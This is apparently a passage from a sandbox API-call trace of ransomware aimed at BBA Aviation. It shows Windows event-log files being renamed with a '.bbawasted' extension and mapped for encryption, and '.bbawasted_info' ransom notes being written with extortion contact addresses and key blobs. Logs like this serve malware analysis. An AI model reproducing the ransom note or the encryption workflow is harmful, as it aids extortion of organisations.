KEY:\r\n[begin_key]S3BR561y+sXwxCq6tW765MTWGYafkS1+H8WowkPChHlfch5neQZg42JSyHnZ+m+u\r\nRbl8gV4bm8pn/wE1qyRt9k0XCVpIJigZZG9SG8abz/aoi1ozvuAUSTSH6vT0QvQJ\r\nUKhElr5YdijINQOEfaM/6W+eHC/yavOTwkxLR9bZsfQVl6GorWkPmtvStRIcYTEG\r\nmUBPB99d2a5DTrNbgARexfEvijqQkWwuZW5cfS1zPVFt+7gqY8fBS+CvKm/iKMM4\r\nVi3C2/X7XdFBh4HHvn1DADikH6a4aqJCZtfyrAL6iHXsZLnYOjvGoijjce4JgDm8\r\n441hjBGxagEnrxXt/Ia2boXNbWyN5h6hK0MQGoTnFECe0bLrsChXF7FCdOWyMA1Z\r\nbOiGgvkvCVUEYaZYz3qZDY65+FAobCOCyvp01eqYYASKsi9O6vFiCreZiLkVcE9i\r\nLMeVl3ZlvaorHka25UjBO4aq92nbj1ZaXi08zuaqryAHQXDfsw8QEKLGuUuBtut8\r\nh0YYTsFK+RBnZhwfYwMGWtymi0+2JlesxU4LQ6FyUaL4BUZljRLo0Tbfd5wChAF/\r\nS+LhE6+fGgjy/ktQqigXuCzRxRLc966r4jUhHiWkO/+goP3/KjaivNAVW6JwoNg0\r\nCw0Orx0BnJGLQ3CjCXjCJU8iJQybGcWXN16nLPLOKCz=[end_key]\r\nKEEP IT\r\n") returned 984 [0194.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0194.869] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0194.869] SetEndOfFile (hFile=0x28c) returned 1 [0194.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.873] CloseHandle (hObject=0x28c) returned 1 [0194.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0194.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9e98 | out: hHeap=0x660000) returned 1 [0194.875] _aulldvrm () returned 0x0 [0194.875] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0194.876] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0194.876] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0194.876] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 58 [0194.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6aecf0 [0194.876] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0194.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.876] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0194.877] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0194.877] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0194.877] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0194.886] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0194.887] SetEndOfFile (hFile=0x28c) returned 1 [0194.887] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.887] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0194.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.bbawasted")) returned 1 [0194.938] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0194.938] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0194.938] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0194.938] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0194.939] CloseHandle (hObject=0x294) returned 1 [0195.314] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0195.314] CloseHandle (hObject=0x280) returned 1 [0195.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0195.315] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0195.315] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0195.315] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0195.315] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0195.316] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0195.316] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0195.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0195.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0195.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0195.329] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tWfuusQtA8+dpmj8MPxi0lY7T4jX2Ve7eMSIDUuBlt9LOz24S5FZhv5uR+28nnLx\r\n6LX+CXlGvHaLZnfEUXGkRRFNxoYiNYRd55OgaQ0pjXQG2BeQpzHBlFCkAYPCTMJ3\r\nlbusPYqZksr5IjZlqUl8aPdyNVKJLr+ruulrXJiVDg5HcXvM8NnOt4uqYjcI7Hbd\r\nSYPtBsVWaBd2a8TFnXYloqbTMbFhr354j3QKHGyL6hLax6OmQpChEdiivnsYLMfh\r\nQONbZT37+rX8hAr4i7nVpRkucH5hsNfp4BSjPR1MGpGEMcCWWkohAxCmSjz3NmbA\r\nB2qHnySVjTvCZQuVkwBvyfPQupuLGoMj8+heOyyAHKZKgUymvgSHXKfH5zdb9AQN\r\nKBoKyCFDIMs6AiARxTaN5fiI0czXRaI5NH2GX6Y2i12j5wjBPCqcJmFKxXf3ezJ3\r\nKaad8WN7l64MTRGSy1voORhuV7DOIey3T4jyQQS0m/2QzAwAutInnTMO24AV1jLe\r\n6KHHjPA1oO3YN7YXSJxb4wFR/Zt/nS4NR3zkQawFDM+9gc/7CBBidKQx7CcxVllT\r\noF0c0VGseUpK/Mbr1avG9tJkDqmDwpI0qhfevCP6zlhV0HbGm5JLsWcY0jIKydl7\r\nFaQxwrNzclj0AUSIszeYDu39yoehml4bFUVsxsaH3Vi=[end_key]\r\nKEEP IT\r\n") returned 984 [0195.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0195.329] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0195.329] SetEndOfFile (hFile=0x28c) returned 1 [0195.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0195.336] CloseHandle (hObject=0x28c) returned 1 [0195.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0195.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ee70 | out: hHeap=0x660000) returned 1 [0195.339] _aulldvrm () returned 0x0 [0195.339] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0195.340] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0195.340] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0195.340] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 76 [0195.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a2) returned 0x6aecf0 [0195.340] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0195.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0195.340] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0195.341] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0195.341] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0195.341] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0195.342] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0195.345] SetEndOfFile (hFile=0x28c) returned 1 [0195.345] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0195.345] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0195.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.bbawasted")) returned 1 [0195.346] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0195.346] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0195.347] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0195.347] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0195.347] CloseHandle (hObject=0x280) returned 1 [0195.570] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0195.571] CloseHandle (hObject=0x294) returned 1 [0195.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0195.571] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0195.571] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0195.571] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0195.572] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0195.572] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0195.572] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0195.583] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0195.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0195.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0195.584] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]M/3uhWQvCwAsxmDdm+wwISvMYt0xWwdqcFZebh3G9HXhqSwdY3BI4m8BHox3R6GX\r\nNXdETIsnAvvkr8hvSaUZY+oFeVy0SK7GmVpmUlyV9+1oqo4p29Q6flaZy5MMGJ/g\r\njJ0dAEh91f1/pnHntEDfsni5QxTf88nre/DbkaxfFU3pvn0a7GoE/PLLUm5y6fPB\r\n6FqRz42RY+qI2CjSvUHK3i1Z55h0Ugjn8w+K6glZQatiR2ZDVUjC3BWVO6pU/LU7\r\nz9mDimizNBwC3u2Ukvc3yNpyozZ5oeRKLHWtKnixx4toSSx5SaBRsggY08jGbWgx\r\noTS8HA4SFHBsvF3GSxBQ4VhkM0iB+v8AI8YyVsR0GGCZh6DAogh3ZNK4We/kRm9z\r\nQmdmGiFIM3/hx24hMNmCfhpePlucg7PGTc0e6dYLqDmgMtFpZZNwpSA1tELpE6Ln\r\n38B5KzEzs8ahDTLcE4hkAeUhdvUu5orzdnTZFxrx/zWU9/b3q4bTeQY9yHUO9YU0\r\nd8SOBoUyWfEB0K94zw9lOvEM0HURloTOyUFVZJDrjOwU+TbWnQtl8ez0LJKA8kI1\r\n4H/+Mw9ljXQhpWgITVCCI+tYq4Cuy1isw6bIZPHzl8jXnzxtpbuF/QdcUkkJPrZr\r\nkIzDiU3GeJDh1YP1TlT1FdLbkGDi2pnA6hyoBHahXAy=[end_key]\r\nKEEP IT\r\n") returned 984 [0195.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0195.584] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0195.584] SetEndOfFile (hFile=0x28c) returned 1 [0195.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0195.587] CloseHandle (hObject=0x28c) returned 1 [0195.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0195.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ef40 | out: hHeap=0x660000) returned 1 [0195.590] _aulldvrm () returned 0x0 [0195.590] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0195.591] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0195.591] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0195.591] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 53 [0195.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6aecf0 [0195.591] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0195.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0195.591] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6d68) returned 1 [0195.592] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0195.592] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0195.592] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0195.593] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0195.706] SetEndOfFile (hFile=0x28c) returned 1 [0195.706] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.706] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0195.706] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0195.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.bbawasted")) returned 1 [0195.708] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0195.708] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0195.708] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0195.708] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x41a0000 [0195.709] CloseHandle (hObject=0x294) returned 1 [0196.064] UnmapViewOfFile (lpBaseAddress=0x41a0000) returned 1 [0196.077] CloseHandle (hObject=0x280) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.077] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0196.078] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.078] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.078] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0196.078] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.079] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.089] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fPRksNj8FVvtVKE0YI8nzIBC8JIr6/4jvCvxNaKF0+xR9T0oux9gXZbFfC/mUDlW\r\ntkmfi+m0vef8+IUbP0xytGqHGZhFMPGj/7xw7r4G9HQzZJvBnMQaStfzCFYCEaai\r\nJ+zciKbCPjD78DcXakmRJlS/3XL+rmGwG60Ert+ftkchm0cZ7Go0Q5k5Z46ewtsc\r\nCETLEq1hvghqVF7V3J5PmsFPc+wGlKmD2d71eAggHx+C7diP7cpVmC7S6mrJfF9W\r\n8YQXI5+2/Z+pPKZCh2RT3Jod4lcoCkJs3+rSqnpPZwuPbrpxG8QpeoexosCPVYIA\r\njufFlBZmIjODMtvyL4EkNhXFBO0tuoIQNFNiO49kbHZ3BL1uRPfW4MAPBT6VJwc2\r\nK/6wHCxTFK/kVMVYGdYiwIWufU97LElaZ8CpaPcy/RrMjd/tTNSCmt3+oaVwEGkH\r\nhP9r7oeleC31EzfzC5IDHmDphDrsd/i4EgT8vZfUy8kYSgk9Um20IpXPesyrwbTq\r\nDMaef69rOhRqRXJEpjVeic+exJ4bB/2QAPQ4V16asWQS5Z+kGyc/eAm+q1jwNZjG\r\nwtGwQI+dYJzL/VHntB9p1s4feeVIra7e3gM3A+Rz4X9tvKR6DaILCjnY2H6YdbSB\r\n4T5IiAYs6/4063FT/6REqsIjv8yKNH9nbqwhlJv8PYH=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.090] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.090] SetEndOfFile (hFile=0x28c) returned 1 [0196.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.092] CloseHandle (hObject=0x28c) returned 1 [0196.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f038 | out: hHeap=0x660000) returned 1 [0196.095] _aulldvrm () returned 0x0 [0196.095] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5e88) returned 1 [0196.095] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.095] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0196.095] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 59 [0196.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0196.096] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.096] 